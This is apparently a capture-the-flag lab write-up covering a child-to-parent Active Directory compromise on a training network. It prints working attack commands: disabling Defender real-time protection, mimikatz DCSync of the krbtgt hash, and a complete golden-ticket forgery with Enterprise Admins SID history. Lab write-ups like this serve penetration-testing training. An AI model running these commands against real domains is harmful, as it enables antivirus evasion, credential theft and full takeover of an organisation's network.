Full Compromise of Parent Domain

Used Tools

python webserver

powershell

mimikatz

Summary

From our attack machine and VPN server, we will start a web server to provide mimikatz and other tools to the corpdc domain controller used to compromise the parent domain. First, we deactivate the AV, and we unsuccessfully try to retrieve the Administrator hash from the rootdc running lsadump::dcsync with our Domain Admin user in Mimikatz. From there, we gather all the necessary information to craft a golden ticket to impersonate the Administrator and do it so. With the impersonated administrator, we are able to access the directories of rootdc and are able to retrieve the flags for fully compromising the parent domain. The next step is to create a user on rootdc with the tools PsExec and SMBExec, but will be discussed in the next section.

Investigation

Running a python webserver on the attack machine to provide the tools to the network.

Downloading the tools to the VPN machine.

Running a Python webserver on the VPN machine to provide the corpdc with the tools we need.

First, we run a PowerShell as administrator on the corpdc and disable AV with the following command and get Mimikatz from the VPN server.

set-mppreference -disablerealtimemonitoring $true

Next, we run mimikatz, check our privileges and try to dump the hashes of the local administrator of the rootdc. But we’ll get an error, that the username is not unique which is clear, because there are multiple local administrators

lsadump::dcsync /dc:rootdc.thereserve.loc /domain:thereserve.loc /user:Administrator

To get a unique identifier of the local administrator of the rootdc machine, we get the SID of the Administrator from the rootdc to repeat the process of dumping the credentials of the local administrator of the rootdc.

Again we get an error and are not able to retrieve the hash.

lsadump::dcsync /dc:rootdc.thereserve.loc /domain:thereserve.loc /user:S-1-5-21-1255581842-1300659601-3764024703-500

After the many failed attempts we craft a golden ticket to impersonate the administrator to get any further.

For this, the following information has to be gathered to craft a golden ticket.

See also https://tryhackme.com/room/exploitingad Exploiting Domain Trust

• The FQDN of the domain

  • corp.thereserve.loc

• The SID of the child domain controller (CORPDC), which we will impersonate in our forged TGT

  • S-1-5-21-170228521-1485475711-3199862024-1009

  Get SID of CORPDC

  PS C:\Windows\system32> Get-ADComputer -Identity "CORPDC"

• The SID of the Enterprise Admins in the parent domain, which we will add as an extra SID to our forged TGT

  • S-1-5-21-1255581842-1300659601-3764024703-519

  Get SID of ROOTDC

  PS C:\Windows\system32> Get-ADGroup -Identity "Enterprise Admins" -Server rootdc.thereserve.loc

• The username of the account we want to impersonate

  • Administrator

• The KRBTGT password hash

  • 0c757a3445acb94a654554f3ac529ede

  mimikatz # lsadump::dcsync /user:corp\krbtgt

# From https://tryhackme.com/room/exploitingad
kerberos::golden /user:Administrator /domain:za.tryhackme.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4:<Password hash of krbtgt user> /sids:<SID of Enterprise Admins group> /ptt

With that information, we are able to craft a golden ticket and impersonate the administrator.

kerberos::golden /user:Administrator /domain:corp.thereserve.loc /sid:S-1-5-21-170228521-1485475711-3199862024-1009 /service:krbtgt /rc4:0c757a3445acb94a654554f3ac529ede /sids:S-1-5-21-1255581842-1300659601-3764024703-519 /ptt

From there we are able to reach the directories of rootdc.

And place our proof of compromises in the given folders. The next section includes creating a new user on rootdc and adding this to the Domain Admins and Enterprise Admins, which would be part of this section, but for a clear structure and being part of compromising the BANK domain its discussed there.

Flag-15: Foothold on Parent Domain

PS C:\Windows\system32> Set-Content -Value "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX" -Path \\rootdc.thereserve.loc\c$\Windows\Temp\0xb0b.txt

Flag-16: Administrative access to Parent Domain

PS C:\Windows\system32> Set-Content -Value "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX" -Path \\rootdc.thereserve.loc\c$\Users\Administrator\0xb0b.txt